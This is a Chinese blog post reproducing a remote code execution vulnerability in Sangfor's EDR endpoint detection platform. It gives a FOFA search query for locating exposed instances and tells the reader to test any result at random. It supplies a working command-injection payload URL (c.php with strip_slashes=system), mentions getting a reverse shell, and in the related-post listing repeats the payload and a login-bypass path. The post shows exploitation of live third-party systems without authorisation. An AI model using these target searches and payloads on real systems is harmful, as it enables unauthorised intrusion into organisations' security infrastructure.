深信服EDR终端检测响应平台RCE漏洞复现

最新推荐文章于 2023-11-09 11:26:05 发布
原创 最新推荐文章于 2023-11-09 11:26:05 发布 · 4.5k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细介绍了深信服EDR终端检测响应平台的远程代码执行(RCE)漏洞,包括漏洞背景、复现过程及修复建议。通过特定payload,攻击者可实现命令执行甚至获取shell权限。

深信服EDR终端检测响应平台RCE漏洞复现

背景介绍

早在2019年11月份的时候,就有人爆出有人手里屯着深信服某产品的0day。由于是0day,当然没有人见过,也就不了了之。就在昨天,HW正式开始的第一天,有个铁憨憨在某军500人的群聊中放出了深信服EDR的复现过程截图,然后这张图就瞬间在安全圈子内传遍了。
在这里插入图片描述

复现过程

我们在fofa,Zoomeye等一些引擎上搜索关键字就可以找到一大堆对公网开放的EDR。以fofa为例,搜索title="终端检测响应平台"

在这里插入图片描述
接着,随便点开一个进行测试,找到登录界面,确认是深信服的EDR

在这里插入图片描述
然后进行payload填写https://xxx/tool/log/c.php?strip_slashes=system&host=id进行命令执行测试
在这里插入图片描述
当然,命令执行成功,也可以反弹shell进行一系列的操作。

修复建议

暂时没有什么好的修复建议,官方也在加紧开发补丁,所以在此之前,尽量下架所有EDR的产品。

声明:以上内容仅供测试人员进行学习参考,请遵守国家法律法规,禁止以本文章从事违法等相关事宜。

漏洞复现】某厂商NGAF防火墙任意文件读取漏洞
晚风不及你
02-29 1682
深信服下一代防火墙NGAF专注网络边界安全效果,通过应用丰富的安全创新防御技术和简单易用的产品设计理念,不仅增强网络边界的安全检测与防控能力,而且实现网络安全风险可视化展示与快速处置,让组织网络边界安全建设更有效、更简单。
深信服EDR任意用户登录漏洞复现
afei001
01-19 1023
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.漏洞修复 1.漏洞概述 2020年HW行动时爆出的深信服EDR漏洞除了前面复现的CNVD-2020-46552深信服EDR远程代码执行漏洞,还有一个EDR任意用户登录漏洞,该漏洞没有CNVD编号。 EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。 2.影响版本 ...
深信服 EDR终端检测响应平台-RCE-0day漏洞
土豆的博客
08-20 1595
注:本文仅供学习使用,请勿用于非法操作,后果与作者无关! 0x01 介绍 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。    0x02 RCE 1、本标题译为远程代码执行(remote command/code execute) 2、
深信服edr终端检测响应平台(_3.2.21)代码审计挖掘(RCE)1
08-03
漏洞危害:可执任意系统命令,影响版本:< 最新版本(3.2.21)前说到,不是把梭的 0day 都不叫 0day,所以我们可以对命令执、代码执等漏洞相关敏感函数
深信服 EDR终端检测响应平台 0day RCE 漏洞
Adminxe的博客
08-18 7113
0x01 前言 昨天睡得正香,突然公司售前就呼来电话,问某某edr出现啥问题了,然后我就给他讲了一遍,这个月太忙了,没时间写博客,今天继续来水一篇。 其次大哥来波最真挚的简介: 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统...
深信服EDR任意用户登录与命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 5756
终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。
【HW2020漏洞回顾】深信服EDR两大漏洞(转载)
jianye33的博客
08-25 3320
深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞 【详情】攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。漏洞影响版
深信服 EDR终端检测响应平台RCE漏洞代码分析
shy的博客
08-18 7912
一觉醒来,听说护网蓝队捕获了一个深信服的0day,待我看完这部局再分析一下。 EDR简介 终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。 fofa语法 title="终端检测响应平台" 漏洞复现 https://ip+端口/tool/log/c.php?strip_slashes=system&host=id 代码分析 将c.php文件拷贝到本地进行分析 $_REQUEST会将接入..
深信服EDR终端检测平台-RCE漏洞复现
thelostworld
08-18 2433
​昨晚通宵,刚刚睡醒发现群里面炸锅了-EDR终端检测平台RCE 自己也来看看。 简介: EDR简介(来自官方): 终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。 EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。 端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服
深信服EDR漏洞复现
黑白的博客
11-06 1931
声明 往后,复现的每个漏洞,我都会分享出来,希望可以通过这种方式,提高自己的能力,也希望大家可以一起学习,共同进步 漏洞描述 据说是有人把源码放网上了,不过看了看源码审计的骨偶成,也确实利用php反序列化,从而RCE 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC
深信服edr终端漏洞
qq_40806924的博客
08-20 4738
一、前言 最近这些天来了广州当蓝方,工作之余听到了几个朋友说关于深信服edr爆0day的情况,自己也没时间复现,就简单记录一下。 该XXX简介: 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 ** 二、影响范围 fofa上大概有37页
深信服应用交付管理系统远程命令执行漏洞复现
薛定谔嘚喵博客
09-07 1663
深信服应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令。
深信服 EDR终端检测响应平台RCE漏洞
汗的博客
08-18 1685
payload https://ip+端口/tool/log/c.php?strip_slashes=system&host=whoami 改改host的参数就能rce fofa语法 title="终端检测响应平台" 处理方式 只能暂时下线,貌似问题还比较多,很多要重写 资产基本是国内的,别乱打了,,, ...
漏洞复现深信服下一代防火墙NGAF存在任意文件上传漏洞 附POC
失心少年
11-09 1342
不仅能够实现网络层访问控制的功能,且能够对应用进行识别、控制、防护, 解决了传统防火墙应用层控制和防护能力不足的问题。区别于传统DPI技术的入侵防御系统,深信服NGAF具备深入应用内容的威胁分析能力,具备双向的内容检测能力为用户提供完整的应用层安全防护功能。同样都能防护web攻击,与web应用防火墙关注web应用程序安全的设计理念不同,深信服下一代防火墙NGAF关注web系统在对外发布的过程中各个层面的安全问题,为对外发布系统打造坚实的防御体系。本文所提供的工具仅用于学习,禁止用于其他!
深信服应用交付报表系统 命令执行漏洞复现
09-28 2914
深信服应用交付报表系统是深信服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。该系统能够为用户提供包括多数据中心负载均衡、多链路负载均衡、服务器负载均衡的全方位解决方案。不仅实现对各个数据中心、链路以及服务器状态的实时监控,同时根据预设规则,将用户的访问请求分配给相应的数据中心、链路以及服务。
深信服应用交付报表系统任意文件读取漏洞复现
薛定谔嘚喵博客
09-07 956
SINFOR AD是深信服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。深信服应用交付报表系统存在任意文件读取漏洞,攻击者利用漏洞可读取设备中的指定路径文件
SXF终端检测平台 EDR漏洞复现
xk的博客
08-18 3177
昨天是2020年9月17日,对于做安全的人来说,特别是渗透红蓝对抗这种的,肯定印象极其深刻: 其中不乏有巨佬坐镇的,也有混子摸鱼混经验的,各种操作姿势也是层出不穷: HW期间听闻的各种神操作: 无人机搞Wi-Fi的 挖下水道进内部的 BadUSB钓鱼的 提前半个月混入甲方的 望远镜看密码的 红队伪装蓝队进行木马钓鱼的 利用深信服0day伪装进入的 首页开局一张图片的 美人计的 只有你想不到的,该做的都做了。害。 昨天最令人震惊的就是深信服EDR设备,作为终端检测响应平台,竟然存在漏洞,还如此之
某信服EDR任意用户登陆漏洞分析
z1feiyu
08-20 2297
影响范围: EDR <= v3.2.19 漏洞描述: 终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 0x01 漏洞复现 /ui/login.php?user=username username 可能会有变动需要f...
评论 3
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值